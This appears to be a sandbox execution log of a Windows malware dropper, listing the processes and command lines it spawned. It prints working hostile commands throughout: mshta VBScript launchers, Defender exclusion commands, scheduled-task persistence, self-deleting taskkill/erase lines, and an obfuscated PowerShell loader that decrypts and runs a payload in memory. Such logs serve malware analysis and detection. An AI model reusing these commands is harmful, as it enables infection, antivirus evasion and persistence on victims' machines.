Tue071e59dc8292b4ef1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07816149b72db00.exe

Tue07816149b72db00.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07006d6b7c.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3496 -ip 3496

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe

Tue07006d6b7c.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 608

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe

Tue078a285ef7.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue078a285ef7.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe" ) do taskkill -F -Im "%~nXU"

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe

SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill -F -Im "Tue07267c17f2f5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3852 -ip 3852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 932

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 620

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4736 -ip 4736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 644

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 620

C:\Windows\SysWOW64\control.exe

control .\FUEj5.QM

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 584

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 868

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

"{path}"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1068

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1288

C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"

C:\Windows\system32\cmd.exe

/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Program Files (x86)\Installoid\installoid.exe

"C:\Program Files (x86)\Installoid\installoid.exe"

C:\Windows\system32\cmd.exe

/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4692 -ip 4692

C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c HelloWord.bat

C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe"

C:\Users\Admin\AppData\Roaming\instal.exe

C:\Users\Admin\AppData\Roaming\instal.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 264

C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_2133_windows_64.exe

C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_2133_windows_64.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 264

C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe

"C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe"

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe" -hq

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 239912 -ip 239912

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 239912 -s 600

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"

C:\Windows\system32\cmd.exe

/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Users\Admin\Pictures\Adobe Films\FWsDwwvaVRZQ.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\FWsDwwvaVRZQ.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe"

C:\Windows\SysWOW64\TapiUnattend.exe

TapiUnattend

C:\Windows\SysWOW64\where.exe

where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /y .\aBiYKZC.31

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Camminato.xla & ping -n 5 localhost

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==

C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 452

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Calore.sldm & ping -n 5 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4472 -ip 4472

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 812

C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"

C:\Users\Admin\AppData\Local\Temp\is-R890Q.tmp\B2BCH2.exe.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R890Q.tmp\B2BCH2.exe.tmp" /SL5="$501FA,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 318992 -ip 318992

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 820

C:\Users\Admin\AppData\Local\Temp\is-GALM5.tmp\djkdj778_______.exe

"C:\Users\Admin\AppData\Local\Temp\is-GALM5.tmp\djkdj778_______.exe" /S /UID=91

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 800

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HelloWord.bat.exe

"HelloWord.bat.exe" -noprofile -executionpolicy bypass -command $Sininy = 'dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgRmVObm1iIHsgcHVibGljIHN0YXRpYyBieXRlW10gWERKalRkKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gR1JPYmdjKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9';$TThmJnNzyf=')))).Entry';$njMLfacfHE='d([FeNnmb]';$TWdyFFHpsV='$tYMOrf.Le';$puiinoPuUR='vsTFxqtvma';$LdXzmmpbbI='g]::UTF8.G';$VgmFdjtTSa='y));Add-Ty';$LcqwqMbbkB='(, [string';$XLABAnCNaC='Point.Invo';$eSVoGBqqcm='tem.Conver';$HncyZNoqMg='rt]::FromB';$dBNFtIDpED='pe -TypeDe';$pNNYCZutDT='uidcVl;[Sy';$uYiNhweZtY='DJjTd([Sys';$obIPVbiMnt='sL08gQ==''';$lBqjUwIWqJ='88RXWjAUO0';$yyiadSWMup='tring(''19';$rNyVgZJHtt='''C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HelloWord.bat'').Split([Environment]::NewLine);$yYcfRx ';$FngBUvdQey='vert]::Fro';$JARBdjgpdf='ing($Sinin';$JrGPaYqkzv='6TZ/iwZae3';$oyPUjucKWH='se64String';$wJAlKnjnsl='[System.IO';$svBdAUiAtM=' [System.C';$zgADwDAhoI='[]] ('''')))';$FioTOnFZJu='GqngnkIZPv';$vQHOPGWzaK='ase64Strin';$aRAFgJMEqM='FeNnmb]::X';$oytbZiWzCc='$tYMOrf = ';$MOuhLpNOcu='mbly]::Loa';$pBWHwgrjPw='System.Con';$zGuuSjFOsl='romBase64S';$RPBdaQsiWF='stem.Conve';$hGiOUYCmhO='ngth - 1];';$ygLbciMlhu='stem.Refle';$aXQGvVLKHY='ke($null, ';$supxmarUas='xt.Encodin';$GQKzYhYCTY='ction.Asse';$udUaphWlZE='($yYcfRx),';$eVgNeLbhkq='Cor1yU3Byr';$BIxIhDruVr='o=''), [Sy';$xRblTPfDfE='adAllText(';$LbhoOkoave='.File]::Re';$zaprKuJapA='[System.Te';$gNhJMfwFyK='finition $';$BGHbwWihUF='$uidcVl = ';$mzPItvJhEv='t]::FromBa';$xAuMwgrRdz='etString([';$skxdeycnZu='::GRObgc([';$fHYHcSZDbf='mBase64Str';$HAIUrnqfnO='= $tYMOrf[';$NXuXKGdafm='onvert]::F';$WuzCaTPDPk='g(''fwpvFx';Invoke-Expression($oytbZiWzCc + $wJAlKnjnsl + $LbhoOkoave + $xRblTPfDfE + $rNyVgZJHtt + $HAIUrnqfnO + $TWdyFFHpsV + $hGiOUYCmhO + $BGHbwWihUF + $zaprKuJapA + $supxmarUas + $LdXzmmpbbI + $xAuMwgrRdz + $pBWHwgrjPw + $FngBUvdQey + $fHYHcSZDbf + $JARBdjgpdf + $VgmFdjtTSa + $dBNFtIDpED + $gNhJMfwFyK + $pNNYCZutDT + $ygLbciMlhu + $GQKzYhYCTY + $MOuhLpNOcu + $njMLfacfHE + $skxdeycnZu + $aRAFgJMEqM + $uYiNhweZtY + $eSVoGBqqcm + $mzPItvJhEv + $oyPUjucKWH + $udUaphWlZE + $svBdAUiAtM + $NXuXKGdafm + $zGuuSjFOsl + $yyiadSWMup + $lBqjUwIWqJ + $eVgNeLbhkq + $puiinoPuUR + $JrGPaYqkzv + $BIxIhDruVr + $RPBdaQsiWF + $HncyZNoqMg + $vQHOPGWzaK + $WuzCaTPDPk + $FioTOnFZJu + $obIPVbiMnt + $TThmJnNzyf + $XLABAnCNaC + $aXQGvVLKHY + $LcqwqMbbkB + $zgADwDAhoI)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 318992 -ip 318992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 800

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yimzptac\yimzptac.cmdline"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4108 -ip 4108

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4368 -ip 4368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 1820

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD59.tmp" "c:\Users\Admin\AppData\Local\Temp\yimzptac\CSC7605DA9E296941508D47B9B04AE6A86E.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1016

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Mixruzki1.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1472

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Mixruzki1.bmp.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1360

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1292

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "mixinte.bmp.exe" /f

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^DSFRIKxgXaTKtMXZByrebjRJrDwrxjAhOWIxSGWRcDMpumUWppHSeWRsqWOyIdTLSGVitCiVojGUmHDEJyUkEHlStdzWSRotKwsm$" Avvenne.sldm

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Marito.exe.pif

Marito.exe.pif x

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\findstr.exe

